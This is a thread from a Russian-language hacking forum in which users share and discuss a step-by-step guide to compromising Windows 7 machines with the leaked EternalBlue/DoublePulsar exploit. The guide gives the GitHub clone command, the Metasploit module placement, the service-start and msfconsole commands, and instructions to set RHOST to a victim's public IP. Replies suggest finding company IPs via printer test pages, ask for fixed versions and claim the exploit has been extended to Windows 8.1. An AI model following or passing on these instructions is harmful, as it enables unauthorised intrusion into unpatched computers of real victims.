Как взломать WINDOWS 7 без участия жертвы [Exploit NSA Eternalblue & Doublepulsar]

Mir.mr

Новичок
Статус
offline
Регистрация
08.06.2017
Сообщения
26
Репутация
2
Забавно, нужно будет попробовать. Сейчас все молодые фирмы на семёрках работают, а если вы работаете в обслуге или чем то подобном, то можно просто находить айпишники с помощью тест листов с принтеров, которые можно получать просто подойдя к нему и нажав пару кнопок.
Как только опробую напишу сюда (если будет о чем писать).
Скорей всего уже вряд ли ты сможешь взломать , ну попробуй , на многих уже не работает это
 

pradovod15

Новичок
Статус
offline
Регистрация
28.07.2017
Сообщения
2
Репутация
0
я бф хотел попросить бросить мне фикснутый вариант.
я так понимаю, мэтры здешнего мира, Вы давно уже это испробовали, я вот тоже хочу))))
 

avosluck

Новичок
Статус
offline
Регистрация
20.12.2016
Сообщения
13
Репутация
0
почти все айпишники под NAt, как взламывать?
 

Putty57

Заблокированные
Статус
offline
Регистрация
07.08.2017
Сообщения
7
Репутация
0
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Представляю вам эксплоит слитый с ресурсов АНБ, может кто-то из вас очень меньшая часть начиталась на викиликс про масштабный слив: кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, данный экслоит нацелен на remote эксплоутацию, то естьабсолютно без всякого участия жертвы. Под взлом подойдут только тачки windows 7 обеих системных архитектур.

Выбираем нужную вам папку и клонируем образ с гитхаб:

Код:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb

Скрины:

Ваш метасплоит должен быть обновлён до последних баз.

17164633.png


В новом окне терминала сначала запустим сервисы метасплоита и базу данных postgresql:
Код:
service postgresql start
Код:
service metasploit start

Запускаем metasploit:

Код:
msfconsole

17164647.png

17164652.png


В LHOST пишем свой локальный IP адрес, узнать можно командой:
Код:
ifconfig
В RHOST пишем публичный IP жертвы

17164720.png


Видео по теме:

А также видео с русской озвучкой:
А как это локальный в lhost если атакуешь через интернет и в rhost пишешь публичный ip. Что-то здесь не то, чужой комп из сети Интеренет не сможет отправить тебе пакет если указан адрес вида 192.168.*.* точнее пакет уйдет но не в сеть интернет, а в локальную сеть жертвы(если конечно он подключен через роутер)
 

Mir.mr

Новичок
Статус
offline
Регистрация
08.06.2017
Сообщения
26
Репутация
2
Есть аналоги , или подобные exploit хотелось бы посмотреть
 

PWD1

Новичок
Статус
offline
Регистрация
26.08.2017
Сообщения
2
Репутация
0
Скорей всего уже вряд ли ты сможешь взломать , ну попробуй , на многих уже не работает это
Ты ошибаешься, данный эксплоит модернизировали в паре с одним скриптом на питоне и он ложит теперь ещё и тачи вин 8.1, по мимо семёрки...
Просто нужны прямые руки, вот и всё)
Базара нет, те кто обновился на восьмёрке - они не попадают под угрозу.
Но на семёрке же никто не обновлялся и не обновится...
 

PWD1

Новичок
Статус
offline
Регистрация
26.08.2017
Сообщения
2
Репутация
0
А как это локальный в lhost если атакуешь через интернет и в rhost пишешь публичный ip. Что-то здесь не то, чужой комп из сети Интеренет не сможет отправить тебе пакет если указан адрес вида 192.168.*.* точнее пакет уйдет но не в сеть интернет, а в локальную сеть жертвы(если конечно он подключен через роутер)
Человек просто показывает на примере своего локального IP адреса...
Почитай про данный эксплоит на других ресурсах, если ты про него ничего не знаешь.